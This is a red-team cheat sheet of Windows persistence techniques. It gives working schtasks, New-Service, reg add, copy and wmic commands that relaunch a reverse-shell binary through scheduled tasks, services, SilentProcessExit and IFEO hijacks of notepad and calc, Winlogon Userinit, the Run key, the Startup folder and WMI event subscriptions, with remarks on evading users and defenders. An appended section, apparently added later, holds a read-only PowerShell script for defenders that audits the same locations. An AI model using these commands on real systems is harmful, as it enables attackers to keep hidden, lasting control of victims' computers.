Introducing a new article featuring a CheatSheet for achieving persistence in Windows systems. We'll explore various methods to accomplish this and conclude with a custom C++ tool I developed to automate the process.
Reference: Windows Red Team Persistence Techniques, part of the HackerSploit Red Team series of guides.
Persistence involves methods adversaries employ to maintain access to systems despite restarts, credential changes, or other disruptions that might terminate their access. These methods encompass any access, action, or configuration modifications that enable them to sustain their presence, such as substituting or manipulating legitimate code or inserting startup code.
In simpler terms, persistence lets you keep access or continue controlling a target computer whenever you want, even after it’s been turned off and on again, without needing to reinfect the device to regain your shell.
- Scheduled Tasks
- Services
- Close App (SilentProcessExit)
- Open App (Image File Execution Options)
- WinLogon
- Run registry key
- Startup Folder
- WMI event subscription (via WMIC)
Using scheduled tasks is one of the easiest ways to maintain persistence. It is also one of the easier methods for a user to spot, since the task is listed in Task Scheduler, but most average users never look there.
To create the task I use schtasks. The following creates a new task (the /SC MINUTE schedule runs it every minute):
schtasks /CREATE /SC MINUTE /TN "Reverse Shell" /TR "C:\Users\s12de\Downloads\shell.exe"
Reference: What is a Windows Service? (Techopedia): a Windows service is an application that usually serves a core operating system function, running in the background.
Windows services are essential parts of the operating system, responsible for handling tasks like memory, device management, user credentials, preferences, and third-party applications. They function similarly to Unix daemons.
To start, open a PowerShell instance. The following creates a new service with an automatic startup type, configured to execute the binary specified in the BinaryPathName field:
New-Service -Name "s12" -BinaryPathName "C:\Users\s12de\Downloads\shell.exe" -Description "PersistenceWindows" -StartupType Automatic
And now start the service:
sc start s12
This next method is my favorite: it allows your binary to execute whenever a specific process or binary is closed. In this example, a reverse shell is triggered when the user terminates the notepad.exe process.
To do this we need to execute these three commands in cmd:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Users\s12de\Downloads\shell.exe"
Result:
When I close Notepad, I automatically receive the reverse shell.
This next method is my second favorite: it allows your binary to execute whenever a specific process or binary is launched. In this case, a reverse shell is triggered when the user opens the calc.exe process.
To do this we need to execute these two commands in cmd:
copy calc.exe _calc.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v Debugger /t reg_sz /d "cmd /C _calc.exe & C:\Users\s12de\Downloads\shell.exe" /f
Result:
When the user opens Calculator, I receive the reverse shell connection.
Reference: Persistence - Winlogon Helper DLL (pentestlab.blog): Winlogon is a Windows component which handles various activities such as the logon, logoff, and loading of the user profile.
Winlogon is a core Windows component responsible for handling actions like logon, logoff, user profile loading during authentication, shutdown, and the lock screen. These behaviors are controlled through the registry, which specifies processes to launch during the logon sequence. From a red team perspective, these events present an opportunity to trigger arbitrary payloads for persistence.
First, query the current value of the Userinit entry:
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit
Now add a registry entry so that your shell.exe executes each time the user logs in, logs out, or locks the screen.
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\Users\s12de\Downloads\shell.exe" /f
Result:
Registry key modified!
Reference: Structure of the Registry, Win32 apps (learn.microsoft.com): the registry is a hierarchical database that contains data critical for the operation of Windows.
The Windows Registry is a hierarchical database essential to the functioning of the operating system, as well as the applications and services running on it. Structured like a tree, each node is referred to as a 'key', which can hold both subkeys and data entries known as 'values'.
In this case, it's time to use the Run registry key, one of the most significant keys in the Windows system. The advantage here is that you don't need administrator privileges to execute your binary using this method, because the key used below lives under HKEY_CURRENT_USER.
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v S12 /t REG_SZ /d "C:\Users\s12de\Downloads\shell.exe"
Result:
After a reboot or user logon, the Windows operating system executes executable files located in the Startup folder. The per-user Startup folder is typically located at:
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
In this case, you only need to run a single command, which simply copies the malicious binary to this path:
copy "shell.exe" "C:\Users\s12de\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\shell.exe"
Reference: Persistence - WMI Event Subscription (pentestlab.blog): Windows Management Instrumentation (WMI) enables system administrators to perform tasks locally and remotely.
Windows Management Instrumentation (WMI) allows system administrators to manage tasks both locally and remotely. From a red team perspective, WMI can be leveraged for various activities such as lateral movement, persistence, situational awareness, code execution, and even as a command and control (C2) mechanism. Since WMI is a built-in component present in nearly all Windows operating systems (from Windows 98 to Windows 10), it enables these offensive actions to remain under the radar of blue team defenses.
The executable will initiate a reverse shell session within 60 seconds of each reboot.
In this case I need to execute three commands:
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="persistence", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="persistence", ExecutablePath="C:\windows\system32\tita.exe",CommandLineTemplate="C:\Users\s12de\Downloads\shell.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"persistence\"", Consumer="CommandLineEventConsumer.Name=\"persistence\""
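As an added defender-side check (not the author's C++ tool and not code from the original cheat sheet), the following PowerShell script enumerates every persistence location this article configures, so the same list doubles as an audit checklist. It assumes an elevated PowerShell 5.1 or later prompt and profiles under C:\Users; it only reads, never modifies, the host.

```powershell
# Added read-only audit of the persistence locations this cheat sheet configures.
# Assumes an elevated PowerShell 5.1+ prompt; it changes nothing on the host.
$nt = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'

# 1. IFEO Debugger values (Open App technique): any image name with a Debugger entry
Get-ChildItem "$nt\Image File Execution Options" -ErrorAction SilentlyContinue | ForEach-Object {
    $dbg = (Get-ItemProperty -LiteralPath $_.PSPath).Debugger
    if ($dbg) { [pscustomobject]@{ Check = 'IFEO Debugger'; Key = $_.PSChildName; Value = $dbg } }
}

# 2. SilentProcessExit MonitorProcess values (Close App technique)
Get-ChildItem "$nt\SilentProcessExit" -ErrorAction SilentlyContinue | ForEach-Object {
    $mon = (Get-ItemProperty -LiteralPath $_.PSPath).MonitorProcess
    if ($mon) { [pscustomobject]@{ Check = 'SilentProcessExit'; Key = $_.PSChildName; Value = $mon } }
}

# 3. Winlogon Userinit: a clean host lists only userinit.exe, so extra entries stand out
$userinit = (Get-ItemProperty "$nt\Winlogon").Userinit
[pscustomobject]@{ Check = 'Winlogon Userinit'; Key = 'Userinit'; Value = $userinit }

# 4. Run keys: HKCU needs no admin rights to write, so inspect both hives
foreach ($hive in 'HKCU', 'HKLM') {
    $run = Get-ItemProperty "${hive}:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
    if ($run) {
        $run.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' } | ForEach-Object {
            [pscustomobject]@{ Check = "$hive Run"; Key = $_.Name; Value = $_.Value }
        }
    }
}

# 5. Per-user Startup folders across every profile, not only the current user
Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*' -ErrorAction SilentlyContinue |
    ForEach-Object { [pscustomobject]@{ Check = 'Startup folder'; Key = $_.FullName; Value = $_.LastWriteTime } }

# 6. WMI permanent event subscriptions: the filter query and what the consumer runs
Get-CimInstance -Namespace 'root\subscription' -ClassName __EventFilter |
    ForEach-Object { [pscustomobject]@{ Check = 'WMI filter'; Key = $_.Name; Value = $_.Query } }
Get-CimInstance -Namespace 'root\subscription' -ClassName CommandLineEventConsumer |
    ForEach-Object { [pscustomobject]@{ Check = 'WMI consumer'; Key = $_.Name; Value = $_.CommandLineTemplate } }

# 7. Scheduled tasks and services whose binary lives under a user profile (as in every example above)
Get-ScheduledTask | Where-Object { $_.Actions.Execute -match '\\Users\\' } |
    ForEach-Object { [pscustomobject]@{ Check = 'Scheduled task'; Key = $_.TaskPath + $_.TaskName; Value = ($_.Actions.Execute -join ' ') } }
Get-CimInstance -ClassName Win32_Service | Where-Object { $_.PathName -match '\\Users\\' } |
    ForEach-Object { [pscustomobject]@{ Check = 'Service'; Key = $_.Name; Value = $_.PathName } }
```

Pipe the output to Format-Table or Export-Csv to compare hosts; on a clean machine the IFEO, SilentProcessExit and WMI sections should return nothing and Userinit should name only userinit.exe.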
That concludes today’s article. I believe this cheat sheet will be highly useful, and I'm also developing a C++ tool to automate the entire process. Stay tuned to my GitHub for updates.
Thanks for reading! :D
-Malforge Group.